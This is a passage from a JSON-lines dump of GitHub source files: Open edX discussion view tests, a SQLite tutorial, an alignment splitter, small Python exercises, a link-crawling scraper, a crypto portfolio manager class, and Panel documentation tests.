course_id=str(self.course.id)) # pylint: disable=no-value-for-parameter, unexpected-keyword-arg\n\n\n@patch('requests.request', autospec=True)\nclass EnterpriseConsentTestCase(EnterpriseTestConsentRequired, ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase):\n \"\"\"\n Ensure that the Enterprise Data Consent redirects are in place only when consent is required.\n \"\"\"\n CREATE_USER = False\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n # Invoke UrlResetMixin setUp\n super().setUp()\n\n username = \"foo\"\n password = \"bar\"\n\n self.discussion_id = 'dummy_discussion_id'\n self.course = CourseFactory.create(discussion_topics={'dummy discussion': {'id': self.discussion_id}})\n self.student = UserFactory.create(username=username, password=password)\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n assert self.client.login(username=username, password=password)\n\n self.addCleanup(translation.deactivate)\n\n @patch('openedx.features.enterprise_support.api.enterprise_customer_for_request')\n def test_consent_required(self, mock_enterprise_customer_for_request, mock_request):\n \"\"\"\n Test that enterprise data sharing consent is required when enabled for the various discussion views.\n \"\"\"\n # ENT-924: Temporary solution to replace sensitive SSO usernames.\n mock_enterprise_customer_for_request.return_value = None\n\n thread_id = 'dummy'\n course_id = str(self.course.id)\n mock_request.side_effect = make_mock_request_impl(course=self.course, text='dummy', thread_id=thread_id)\n\n for url in (\n reverse('forum_form_discussion',\n kwargs=dict(course_id=course_id)),\n reverse('single_thread',\n kwargs=dict(course_id=course_id, discussion_id=self.discussion_id, thread_id=thread_id)),\n ):\n self.verify_consent_required(self.client, url) # pylint: disable=no-value-for-parameter\n\n\nclass DividedDiscussionsTestCase(CohortViewsTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def create_divided_discussions(self):\n \"\"\"\n Set up a divided discussion in the system, complete with all the fixings\n \"\"\"\n divided_inline_discussions = ['Topic A']\n divided_course_wide_discussions = [\"Topic B\"]\n divided_discussions = divided_inline_discussions + divided_course_wide_discussions\n\n # inline discussion\n BlockFactory.create(\n parent_location=self.course.location,\n category=\"discussion\",\n discussion_id=topic_name_to_id(self.course, \"Topic A\"),\n discussion_category=\"Chapter\",\n discussion_target=\"Discussion\",\n start=datetime.now()\n )\n # get updated course\n self.course = self.store.get_item(self.course.location)\n # course-wide discussion\n discussion_topics = {\n \"Topic B\": {\"id\": \"Topic B\"},\n }\n\n config_course_cohorts(\n self.course,\n is_cohorted=True,\n )\n\n config_course_discussions(\n self.course,\n discussion_topics=discussion_topics,\n divided_discussions=divided_discussions\n )\n return divided_inline_discussions, divided_course_wide_discussions\n\n\nclass CourseDiscussionTopicsTestCase(DividedDiscussionsTestCase):\n \"\"\"\n Tests the `divide_discussion_topics` view.\n \"\"\"\n MODULESTORE = TEST_DATA_SPLIT_MODULESTORE\n\n def test_non_staff(self):\n \"\"\"\n Verify that we cannot access divide_discussion_topics if we're a non-staff user.\n \"\"\"\n self._verify_non_staff_cannot_access(views.discussion_topics, \"GET\", [str(self.course.id)])\n\n def test_get_discussion_topics(self):\n \"\"\"\n Verify that discussion_topics is working for HTTP 
GET.\n \"\"\"\n # create inline & course-wide discussion to verify the different map.\n self.create_divided_discussions()\n\n response = self.get_handler(self.course, handler=views.discussion_topics)\n start_date = response['inline_discussions']['subcategories']['Chapter']['start_date']\n expected_response = {\n \"course_wide_discussions\": {\n 'children': [['Topic B', TYPE_ENTRY]],\n 'entries': {\n 'Topic B': {\n 'sort_key': 'A',\n 'is_divided': True,\n 'id': topic_name_to_id(self.course, \"Topic B\"),\n 'start_date': response['course_wide_discussions']['entries']['Topic B']['start_date']\n }\n }\n },\n \"inline_discussions\": {\n 'subcategories': {\n 'Chapter': {\n 'subcategories': {},\n 'children': [['Discussion', TYPE_ENTRY]],\n 'entries': {\n 'Discussion': {\n 'sort_key': None,\n 'is_divided': True,\n 'id': topic_name_to_id(self.course, \"Topic A\"),\n 'start_date': start_date\n }\n },\n 'sort_key': 'Chapter',\n 'start_date': start_date\n }\n },\n 'children': [['Chapter', TYPE_SUBCATEGORY]]\n }\n }\n assert response == expected_response\n\n\nclass CourseDiscussionsHandlerTestCase(DividedDiscussionsTestCase):\n \"\"\"\n Tests the course_discussion_settings_handler\n \"\"\"\n MODULESTORE = TEST_DATA_SPLIT_MODULESTORE\n\n def get_expected_response(self):\n \"\"\"\n Returns the static response dict.\n \"\"\"\n return {\n 'always_divide_inline_discussions': False,\n 'divided_inline_discussions': [],\n 'divided_course_wide_discussions': [],\n 'id': 1,\n 'division_scheme': 'cohort',\n 'available_division_schemes': ['cohort']\n }\n\n def test_non_staff(self):\n \"\"\"\n Verify that we cannot access course_discussions_settings_handler if we're a non-staff user.\n \"\"\"\n self._verify_non_staff_cannot_access(\n course_discussions_settings_handler, \"GET\", [str(self.course.id)]\n )\n self._verify_non_staff_cannot_access(\n course_discussions_settings_handler, \"PATCH\", [str(self.course.id)]\n )\n\n def test_update_always_divide_inline_discussion_settings(self):\n \"\"\"\n Verify that course_discussions_settings_handler is working for always_divide_inline_discussions via HTTP PATCH.\n \"\"\"\n config_course_cohorts(self.course, is_cohorted=True)\n\n response = self.get_handler(self.course, handler=course_discussions_settings_handler)\n\n expected_response = self.get_expected_response()\n\n assert response == expected_response\n\n expected_response['always_divide_inline_discussions'] = True\n response = self.patch_handler(\n self.course, data=expected_response, handler=course_discussions_settings_handler\n )\n\n assert response == expected_response\n\n def test_update_course_wide_discussion_settings(self):\n \"\"\"\n Verify that course_discussions_settings_handler is working for divided_course_wide_discussions via HTTP PATCH.\n \"\"\"\n # course-wide discussion\n discussion_topics = {\n \"Topic B\": {\"id\": \"Topic B\"},\n }\n\n config_course_cohorts(self.course, is_cohorted=True)\n config_course_discussions(self.course, discussion_topics=discussion_topics)\n\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n\n expected_response = self.get_expected_response()\n assert response == expected_response\n\n expected_response['divided_course_wide_discussions'] = [topic_name_to_id(self.course, \"Topic B\")]\n response = self.patch_handler(\n self.course, data=expected_response, handler=views.course_discussions_settings_handler\n )\n\n assert response == expected_response\n\n def test_update_inline_discussion_settings(self):\n \"\"\"\n Verify that 
course_discussions_settings_handler is working for divided_inline_discussions via HTTP PATCH.\n \"\"\"\n config_course_cohorts(self.course, is_cohorted=True)\n\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n\n expected_response = self.get_expected_response()\n assert response == expected_response\n\n RequestCache.clear_all_namespaces()\n now = datetime.now()\n # inline discussion\n BlockFactory.create(\n parent_location=self.course.location,\n category=\"discussion\",\n discussion_id=\"Topic_A\",\n discussion_category=\"Chapter\",\n discussion_target=\"Discussion\",\n start=now\n )\n\n expected_response['divided_inline_discussions'] = [\"Topic_A\"]\n response = self.patch_handler(\n self.course, data=expected_response, handler=views.course_discussions_settings_handler\n )\n\n assert response == expected_response\n\n def test_get_settings(self):\n \"\"\"\n Verify that course_discussions_settings_handler is working for HTTP GET.\n \"\"\"\n divided_inline_discussions, divided_course_wide_discussions = self.create_divided_discussions()\n\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n expected_response = self.get_expected_response()\n\n expected_response['divided_inline_discussions'] = [topic_name_to_id(self.course, name)\n for name in divided_inline_discussions]\n expected_response['divided_course_wide_discussions'] = [topic_name_to_id(self.course, name)\n for name in divided_course_wide_discussions]\n\n assert response == expected_response\n\n def test_update_settings_with_invalid_field_data_type(self):\n \"\"\"\n Verify that course_discussions_settings_handler return HTTP 400 if field data type is incorrect.\n \"\"\"\n config_course_cohorts(self.course, is_cohorted=True)\n\n response = self.patch_handler(\n self.course,\n data={'always_divide_inline_discussions': ''},\n expected_response_code=400,\n handler=views.course_discussions_settings_handler\n )\n assert 'Incorrect field type for `{}`. 
Type must be `{}`'.format(\n 'always_divide_inline_discussions',\n bool.__name__\n ) == response.get('error')\n\n def test_available_schemes(self):\n # Cohorts disabled, single enrollment mode.\n config_course_cohorts(self.course, is_cohorted=False)\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n expected_response = self.get_expected_response()\n expected_response['available_division_schemes'] = []\n assert response == expected_response\n\n # Add 2 enrollment modes\n CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.AUDIT)\n CourseModeFactory.create(course_id=self.course.id, mode_slug=CourseMode.VERIFIED)\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n expected_response['available_division_schemes'] = [CourseDiscussionSettings.ENROLLMENT_TRACK]\n assert response == expected_response\n\n # Enable cohorts\n config_course_cohorts(self.course, is_cohorted=True)\n response = self.get_handler(self.course, handler=views.course_discussions_settings_handler)\n expected_response['available_division_schemes'] = [\n CourseDiscussionSettings.COHORT, CourseDiscussionSettings.ENROLLMENT_TRACK\n ]\n assert response == expected_response\n\n\nclass DefaultTopicIdGetterTestCase(ModuleStoreTestCase):\n \"\"\"\n Tests the `_get_discussion_default_topic_id` helper.\n \"\"\"\n\n def test_no_default_topic(self):\n discussion_topics = {\n 'dummy discussion': {\n 'id': 'dummy_discussion_id',\n },\n }\n course = CourseFactory.create(discussion_topics=discussion_topics)\n expected_id = None\n result = _get_discussion_default_topic_id(course)\n assert expected_id == result\n\n def test_default_topic_id(self):\n discussion_topics = {\n 'dummy discussion': {\n 'id': 'dummy_discussion_id',\n },\n 'another discussion': {\n 'id': 'another_discussion_id',\n 'default': True,\n },\n }\n course = CourseFactory.create(discussion_topics=discussion_topics)\n expected_id = 'another_discussion_id'\n result = _get_discussion_default_topic_id(course)\n assert expected_id == result\n\n\nclass ThreadViewedEventTestCase(EventTestMixin, ForumsEnableMixin, UrlResetMixin, ModuleStoreTestCase):\n \"\"\"\n Forum thread views are expected to launch analytics events. 
Test these here.\n \"\"\"\n\n CATEGORY_ID = 'i4x-edx-discussion-id'\n CATEGORY_NAME = 'Discussion 1'\n PARENT_CATEGORY_NAME = 'Chapter 1'\n\n DUMMY_THREAD_ID = 'dummythreadids'\n DUMMY_TITLE = 'Dummy title'\n DUMMY_URL = 'https://example.com/dummy/url/'\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self): # pylint: disable=arguments-differ\n super().setUp('lms.djangoapps.discussion.django_comment_client.base.views.tracker')\n\n self.course = CourseFactory.create(\n teams_configuration=TeamsConfig({\n 'topics': [{\n 'id': 'arbitrary-topic-id',\n 'name': 'arbitrary-topic-name',\n 'description': 'arbitrary-topic-desc'\n }]\n })\n )\n seed_permissions_roles(self.course.id)\n\n PASSWORD = 'test'\n self.student = UserFactory.create(password=PASSWORD)\n CourseEnrollmentFactory(user=self.student, course_id=self.course.id)\n\n self.staff = UserFactory.create(is_staff=True)\n UserBasedRole(user=self.staff, role=CourseStaffRole.ROLE).add_course(self.course.id)\n\n self.category = BlockFactory.create(\n parent_location=self.course.location,\n category='discussion',\n discussion_id=self.CATEGORY_ID,\n discussion_category=self.PARENT_CATEGORY_NAME,\n discussion_target=self.CATEGORY_NAME,\n )\n self.team = CourseTeamFactory.create(\n name='Team 1',\n course_id=self.course.id,\n topic_id='arbitrary-topic-id',\n discussion_topic_id=self.category.discussion_id,\n )\n CourseTeamMembershipFactory.create(team=self.team, user=self.student)\n self.client.login(username=self.student.username, password=PASSWORD)\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n @patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.perform_request')\n def test_thread_viewed_event(self, mock_perform_request):\n mock_perform_request.side_effect = make_mock_perform_request_impl(\n course=self.course,\n text=self.DUMMY_TITLE,\n thread_id=self.DUMMY_THREAD_ID,\n commentable_id=self.category.discussion_id,\n )\n url = '/courses/{}/discussion/forum/{}/threads/{}'.format(\n str(self.course.id),\n self.category.discussion_id,\n self.DUMMY_THREAD_ID\n )\n self.client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n\n expected_event = {\n 'id': self.DUMMY_THREAD_ID,\n 'title': self.DUMMY_TITLE,\n 'commentable_id': self.category.discussion_id,\n 'category_id': self.category.discussion_id,\n 'category_name': self.category.discussion_target,\n 'user_forums_roles': [FORUM_ROLE_STUDENT],\n 'user_course_roles': [],\n 'target_username': self.student.username,\n 'team_id': self.team.id,\n 'url': self.DUMMY_URL,\n }\n expected_event_items = list(expected_event.items())\n\n self.assert_event_emission_count('edx.forum.thread.viewed', 1)\n _, event = self.get_latest_call_args()\n event_items = list(event.items())\n assert all(kv_pair in event_items for kv_pair in expected_event_items)\n\n\n@ddt.ddt\n@patch(\n 'openedx.core.djangoapps.django_comment_common.comment_client.utils.perform_request',\n Mock(\n return_value={\n \"id\": \"test_thread\",\n \"title\": \"Title\",\n \"body\": \"\",\n \"default_sort_key\": \"date\",\n \"upvoted_ids\": [],\n \"downvoted_ids\": [],\n \"subscribed_thread_ids\": [],\n }\n )\n)\nclass ForumMFETestCase(ForumsEnableMixin, SharedModuleStoreTestCase):\n \"\"\"\n Tests that the MFE upgrade banner and the MFE are shown in the correct situation with the correct UI\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.course = CourseFactory.create()\n self.user = UserFactory.create()\n self.staff_user = AdminFactory.create()\n CourseEnrollmentFactory.create(user=self.user, course_id=self.course.id)\n\n @override_settings(DISCUSSIONS_MICROFRONTEND_URL=\"http://test.url\")\n def test_redirect_from_legacy_base_url_to_new_experience(self):\n \"\"\"\n Verify that the legacy url is redirected to the MFE homepage when the\n ENABLE_DISCUSSIONS_MFE flag is enabled.\n \"\"\"\n\n with override_waffle_flag(ENABLE_DISCUSSIONS_MFE, True):\n self.client.login(username=self.user.username, password=self.TEST_PASSWORD)\n url = reverse(\"forum_form_discussion\", args=[self.course.id])\n response = self.client.get(url)\n assert response.status_code == 302\n expected_url = f\"{settings.DISCUSSIONS_MICROFRONTEND_URL}/{str(self.course.id)}\"\n assert response.url == expected_url\n\n @override_settings(DISCUSSIONS_MICROFRONTEND_URL=\"http://test.url\")\n def test_redirect_from_legacy_profile_url_to_new_experience(self):\n \"\"\"\n Verify that the requested user profile is redirected to the MFE learners tab when the\n ENABLE_DISCUSSIONS_MFE flag is enabled.\n \"\"\"\n\n with override_waffle_flag(ENABLE_DISCUSSIONS_MFE, True):\n self.client.login(username=self.user.username, password=self.TEST_PASSWORD)\n url = reverse(\"user_profile\", args=[self.course.id, self.user.id])\n response = self.client.get(url)\n assert response.status_code == 302\n expected_url = f\"{settings.DISCUSSIONS_MICROFRONTEND_URL}/{str(self.course.id)}/learners\"\n assert response.url == expected_url\n\n @override_settings(DISCUSSIONS_MICROFRONTEND_URL=\"http://test.url\")\n def test_redirect_from_legacy_single_thread_to_new_experience(self):\n \"\"\"\n Verify that a legacy single thread url is redirected to the corresponding MFE thread url when the\n ENABLE_DISCUSSIONS_MFE flag is enabled.\n \"\"\"\n\n with override_waffle_flag(ENABLE_DISCUSSIONS_MFE, True):\n self.client.login(username=self.user.username, password=self.TEST_PASSWORD)\n url = reverse(\"single_thread\", args=[self.course.id, \"test_discussion\", \"test_thread\"])\n response = self.client.get(url)\n assert response.status_code == 302\n expected_url = f\"{settings.DISCUSSIONS_MICROFRONTEND_URL}/{str(self.course.id)}/posts/test_thread\"\n assert response.url == expected_url\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/discussion/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":95585,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"74188039120","text":"# http://www.sqlitetutorial.net/sqlite-python/\n\n# to view this database, go to C:\\data\\db and run `sqlite3 pythonsqlite.db`\n\nimport sqlite3\n\nsql_cmd = { \"create_table\": {\n \"projects\": \"\"\"CREATE TABLE IF NOT EXISTS projects (\n id integer PRIMARY KEY,\n name text NOT NULL,\n begin_date text,\n end_date text\n ); \"\"\",\n \"tasks\": \"\"\"CREATE TABLE IF NOT EXISTS tasks (\n id integer PRIMARY KEY,\n name text NOT NULL,\n priority integer,\n status_id integer NOT NULL,\n project_id integer NOT NULL,\n begin_date text NOT NULL,\n end_date text NOT NULL,\n FOREIGN KEY (project_id) 
REFERENCES projects (id)\n );\"\"\" } ,\n \"insert_row\": {\n \"projects\": ''' INSERT INTO projects(name, begin_date, end_date) VALUES(?,?,?) ''',\n \"tasks\": ''' INSERT INTO tasks(name, priority, status_id, project_id, begin_date, end_date) VALUES(?,?,?,?,?,?) '''}\n }\n\ndef create_connection(db_file=None):\n if db_file is None:\n db_file = ':memory:'\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except sqlite3.Error as e:\n print(e)\n\ndef create_table(conn, table):\n sql = sql_cmd[\"create_table\"][table]\n try:\n c = conn.cursor()\n c.execute(sql)\n except sqlite3.Error as e:\n print(e)\n\n# \"Row\" is a tuple\ndef insert_row(conn, row, table):\n sql = sql_cmd[\"insert_row\"][table]\n cur = conn.cursor()\n cur.execute(sql, row) # row's values replace the '?'s in sql\n return cur.lastrowid\n\ndef delete_row(conn, id, table):\n sql = 'DELETE FROM ' + table + ' WHERE id=?'\n cur = conn.cursor()\n cur.execute(sql, (id,))\n\ndef delete_all_rows(conn, table):\n sql = 'DELETE FROM ' + table\n cur = conn.cursor()\n cur.execute(sql)\n\ndef update_rows(conn, update_params, table):\n sql = ''' UPDATE tasks\n SET priority = ? ,\n begin_date = ? ,\n end_date = ?\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql, update_params)\n\ndef view_table(conn, table):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM \" + table)\n for row in cur.fetchall():\n print(row)\n\nif __name__ == '__main__':\n conn = create_connection(\"C:\\\\data\\\\db\\\\pythonsqlite.db\")\n \n create_table(conn, \"projects\")\n create_table(conn, \"tasks\")\n \n project = ('Cool App with SQLite & Python', '2015-01-01', '2015-01-30');\n project_id = insert_row(conn, project, \"projects\")\n\n task_1 = ('Analyze the requirements of the app', 1, 1, project_id, '2015-01-01', '2015-01-02')\n task_2 = ('Confirm with user about the top requirements', 1, 1, project_id, '2015-01-03', '2015-01-05')\n insert_row(conn, task_1, \"tasks\")\n insert_row(conn, task_2, \"tasks\")\n\n update_rows(conn, (2, '2015-01-04', '2015-01-06',2), \"tasks\")\n\n view_table(conn, \"tasks\")\n \n conn.close()","repo_name":"shuklak13/Python-Notes","sub_path":"Tools/sqlite_ex.py","file_name":"sqlite_ex.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20177765964","text":"#!/usr/bin/env python\n \nimport sys\nimport time\nfrom alignment import *\n\nlogs = sys.stderr\n\ndef usage():\n\tprint >> logs, \"cat align-union | ~/newcode/split_alignment.py [--GIZA] [--inv] file1 file2\"\n\tprint >> logs, \"\\t-G, --GIZA\\t use GIZA format: 4 5 instead of 4-5\"\n\tsys.exit(1)\n\ngiza = False\n\ndef getopts():\n\tglobal giza, norm_file, invr_file\n\timport getopt\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"G\", [\"GIZA\", \"inv\"])\n\texcept:\n\t\tusage()\n\tfor o, a in opts:\n\t\tif o == \"--GIZA\":\n\t\t\tgiza = True\n\t\telif o == \"--inv\":\n\t\t\tset_inverse(True)\n\t\telse:\n\t\t\tusage()\n\n\tif len(args) == 2:\n\t\tnorm_file, invr_file = open(args[0], \"w\"), open(args[1], \"w\")\n\telse:\n\t\tusage()\n\t\t\ndef main():\n\tfor i, line in enumerate(sys.stdin): # don't zip: not lazy\n\n\t\tif (i+1) % 10000 == 0:\n\t\t\tprint >> logs, i+1, \"lines processed\"\n\n\t\tpoints = get_two_alignments(line, i)\n\n\t\tprint_alignment(points[0], norm_file, giza, cr=None, pr=None)\n\t\tprint_alignment(points[1], invr_file, giza, cr=swap, pr=None)\t\t\n\t\t\nif __name__ == \"__main__\":\n\ttry:\n\t\timport 
psyco\n\t\tpsyco.full()\n\texcept:\n\t\tpass\n\tgetopts()\n\tmain()\n","repo_name":"fascal/alignment","sub_path":"split_alignment.py","file_name":"split_alignment.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14957455053","text":"from itertools import combinations\n\ndef solution(numbers):\n    lists = list(combinations(numbers,2)) # all pairs (n choose 2) drawn from the input numbers\n    answer = []\n    for i in range(len(lists)):\n        pair_sum = lists[i][0]+lists[i][1]  # renamed from 'sum' to avoid shadowing the built-in\n        answer.append(pair_sum)\n    answer = sorted(set(answer))\n    return answer\n","repo_name":"threegenie/Programmers_Algorithm","sub_path":"Level 1/두 개 뽑아서 더하기.py","file_name":"두 개 뽑아서 더하기.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20298923562","text":"import urllib.request, urllib.parse, urllib.error\r\nfrom bs4 import BeautifulSoup\r\nimport ssl\r\nimport socket\r\n\r\n# Ignore SSL certificate errors\r\ndef findLinks(url):\r\n    if url[-1] != \"/\":\r\n        url = url + \"/\"\r\n    ctx = ssl.create_default_context()\r\n    ctx.check_hostname = False\r\n    ctx.verify_mode = ssl.CERT_NONE\r\n\r\n#url = input('Enter - ')\r\n    html = urllib.request.urlopen(url, context=ctx).read()\r\n    soup = BeautifulSoup(html, 'html.parser')\r\n\r\n    # Retrieve all of the anchor tags\r\n    tags = soup('a')\r\n    linkedTo = []\r\n    for tag in tags:\r\n        lurl = tag.get(\"href\", \"\")\r\n        #print(lurl)\r\n        if len(lurl)>3:\r\n            if lurl[:4] == \"http\":\r\n                linkedTo.append(lurl)\r\n            elif lurl[0] != \"#\":\r\n                if lurl[0] != \"/\":\r\n                    linkedTo.append(url + lurl)\r\n                else:\r\n                    linkedTo.append(url + lurl[1:])\r\n##    for l in linkedTo:\r\n##        print(l)\r\n    return linkedTo\r\n    \r\n\r\ndef extensibleFL(urls):\r\n    r = []\r\n    for url in urls:\r\n        #print(url)\r\n        try:\r\n            r = r + findLinks(url)\r\n        except urllib.error.HTTPError:\r\n            #print(\"URLLib HTTPError on, \", url)\r\n            print()\r\n        except socket.gaierror:\r\n            print(\"Socket GAIError on, \", url)\r\n        \r\n    r = list(set(r))\r\n    return r\r\n\r\nefl = extensibleFL\r\n\r\ndef findWithin(url, md=3):\r\n    # expand layer by layer instead of building \"efl(efl(...))\" strings for eval()\r\n    r = []\r\n    layer = [url]\r\n    for d in range(1, md + 1):\r\n        layer = efl(layer)\r\n        r = r + layer\r\n    r = list(set(r))\r\n    return r\r\nfw = findWithin\r\n\r\nurl = input(\"URL?: \")\r\nd = int(input(\"Distance?: \"))\r\ntwoAway = fw(url, d)\r\nfor l in twoAway:\r\n    print(l)\r\n","repo_name":"CodinguyAM/Miscellaneous","sub_path":"bs4 urllinks.py","file_name":"bs4 urllinks.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13503851753","text":"#! /usr/bin/python\n\ns = 'azcbobobegghakl'  # sample input; the original exercise assumes s is supplied by the grader\nsubstr = \"\"\nlong = \"\"\nfor i in range(len(s)):\n    if len(long) > 0:\n        if long[-1] <= s[i]:\n            long += s[i]\n        else:\n            long = s[i]\n    else:\n        long = s[i]\n    if len(long) > len(substr):\n        substr = long\nprint('Longest substring in alphabetical order is: ' + str(substr))\n\n\n","repo_name":"craigderington/mit-intro-comp-science-python","sub_path":"week1/week1_problem3.py","file_name":"week1_problem3.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42139622602","text":"import pymongo\nimport numpy as np\nfrom flask import Flask\nimport requests\nimport json\nimport math\nimport datetime\n\nfrom stock_manager.stock import Stock\n\ndef mapper(x):\n    return np.average(x[\"predictions\"])\n\nclass Manager:\n    eth_per_stock = 0.1\n\n    def __init__(self, global_config, currency_config, db, data_distributor):\n        self.stocks = []\n        self.global_config = global_config\n        self.currency_config = currency_config\n        self.db = db\n        self.data_distributor = data_distributor\n        wallet = self.db.get(\"manager\", \"wallet\").find({\"type\": \"eth\"})\n        if wallet.count() == 0:\n            self.wallet = 2.0 \n            self.db.get(\"manager\", \"wallet\").insert_one({\n                \"type\": \"eth\",\n                \"quantity\": self.wallet\n            })\n        else:\n            self.wallet = float(wallet[0][\"quantity\"])\n\n    def buy(self, currency):\n        active_stocks = self.db.get(\"manager\", \"stocks\").find({\"sell\": None})\n        if active_stocks.count() >= 20:\n            return \"full\"\n\n        currency_stocks = self.db.get(\"manager\", \"stocks\").find({\"symbol\": currency})\n        if currency_stocks.count() > 0:\n            return \"slot filled\"\n\n        price = self.data_distributor.provider.get_average_price(currency)\n        quantity = float(self.eth_per_stock) / price\n        if self.wallet < price * quantity:\n            return \"not enough funds\"\n        \n        self.wallet -= price * quantity\n        self.update_wallet()\n        stock = self.buy_stock(currency, quantity, price)\n        self.db.get(\"manager\", \"stocks\").insert_one(stock)\n\n        return \"OK\"\n\n    def sell(self, currency):\n        stocks = self.db.get(\"manager\", \"stocks\").find({\"sell\": None})\n        sold = 0\n        for stock in stocks:\n            if stock[\"symbol\"] == currency:\n                result = self.db.get(\"manager\", \"stocks\").delete_one(stock)\n                price = self.data_distributor.provider.get_average_price(currency)\n                self.wallet += price * stock[\"quantity\"]\n                self.update_wallet()\n                self.sell_stock(stock, price)\n                self.db.get(\"manager\", \"stocks\").insert_one(stock)\n                sold += result.deleted_count\n        return str(sold)\n\n    def get_worth(self):\n        stocks = self.db.get(\"manager\", \"stocks\").find({\"sell\": None})\n        worth = 0\n        for stock in stocks:\n            price = self.data_distributor.provider.get_average_price(stock[\"symbol\"])\n            worth += price * stock[\"quantity\"]\n        return worth + self.wallet\n\n    def get_stocks_active(self):\n        stocks = self.db.get(\"manager\", \"stocks\").find({\"sell\": None})\n        stocks_list = []\n        for stock in stocks:\n            s = {\n                \"symbol\": stock[\"symbol\"],\n                \"quantity\": stock[\"quantity\"],\n                \"buy_price\": stock[\"buy\"][\"price\"]\n            }\n            stocks_list.append(s)\n        return json.dumps(stocks_list)\n\n    def get_stocks_history(self):\n        stocks = list(self.db.get(\"manager\", \"stocks\").find())\n        for stock in stocks:\n            del stock[\"_id\"]  # drop Mongo's ObjectId (was del stock[\"id\"]), which json.dumps cannot serialize\n        return json.dumps(stocks)\n\n    def sell_stock(self, stock, price):\n        stock[\"sell\"] = {\n            \"price\": price * self.global_config[\"binance\"][\"loss\"],\n            \"timestamp\": int(datetime.datetime.now().timestamp())\n        }\n\n    def buy_stock(self, symbol, quantity, 
price):\n return {\n \"symbol\": symbol,\n \"quantity\": quantity * self.global_config[\"binance\"][\"loss\"],\n \"buy\": {\n \"price\": price,\n \"timestamp\": int(datetime.datetime.now().timestamp())\n },\n \"sell\": None\n }\n def update_wallet(self):\n self.db.get(\"manager\", \"wallet\").find_one_and_update({'type': 'eth'}, {'$set': {'quantity': self.wallet}})\n ","repo_name":"iv-p/ceres","sub_path":"stock_manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23834495565","text":"\"\"\"\nThe ref_available tests verify that all of the panes, layouts, and widgets defined by panel are\nrepresented in the reference gallery.\n\nThe doc_available tests check that python in markdown files can be run top to bottom.\n\n\"\"\"\nimport ast\nimport runpy\n\nfrom inspect import isclass\nfrom pathlib import Path\n\nimport pytest\n\nimport panel as pn\n\npytestmark = pytest.mark.docs\n\nREF_PATH = Path(__file__).parents[2] / \"examples\" / \"reference\"\nref_available = pytest.mark.skipif(not REF_PATH.is_dir(), reason=\"folder 'examples/reference' not found\")\n\nDOC_PATH = Path(__file__).parents[2] / \"doc\"\nIGNORED = ['vtk']\ndoc_files = [df for df in sorted(DOC_PATH.rglob(\"*.md\")) if not any(ig in str(df).lower() for ig in IGNORED)]\ndoc_available = pytest.mark.skipif(not DOC_PATH.is_dir(), reason=\"folder 'doc' not found\")\n\n\n@ref_available\ndef test_layouts_are_in_reference_gallery():\n exceptions = {\"ListPanel\", \"Panel\"}\n docs = {f.with_suffix(\"\").name for f in (REF_PATH / \"layouts\").iterdir()}\n\n def is_panel_layout(attr):\n layout = getattr(pn.layout, attr)\n return isclass(layout) and issubclass(layout, pn.layout.Panel)\n\n layouts = set(filter(is_panel_layout, dir(pn.layout)))\n assert layouts - exceptions - docs == set()\n\n\n@ref_available\ndef test_widgets_are_in_reference_gallery():\n exceptions = {\"Ace\", \"CompositeWidget\", \"Widget\", \"ToggleGroup\", \"NumberInput\", \"Spinner\"}\n docs = {\n f.with_suffix(\"\").name\n for g in (\"indicators\", \"widgets\")\n for f in (REF_PATH / g).iterdir()\n }\n\n def is_panel_widget(attr):\n widget = getattr(pn.widgets, attr)\n return isclass(widget) and issubclass(widget, pn.widgets.Widget)\n\n widgets = set(filter(is_panel_widget, dir(pn.widgets)))\n assert widgets - exceptions - docs == set()\n\n\n@ref_available\ndef test_panes_are_in_reference_gallery():\n exceptions = {\"PaneBase\", \"YT\", \"RGGPlot\", \"Interactive\", \"ICO\", \"Image\", \"IPyLeaflet\"}\n docs = {f.with_suffix(\"\").name for f in (REF_PATH / \"panes\").iterdir()}\n\n def is_panel_pane(attr):\n pane = getattr(pn.pane, attr)\n return isclass(pane) and issubclass(pane, pn.pane.PaneBase)\n\n panes = set(filter(is_panel_pane, dir(pn.pane)))\n assert panes - exceptions - docs == set()\n\n\n@doc_available\n@pytest.mark.parametrize(\n \"file\", doc_files, ids=[str(f.relative_to(DOC_PATH)) for f in 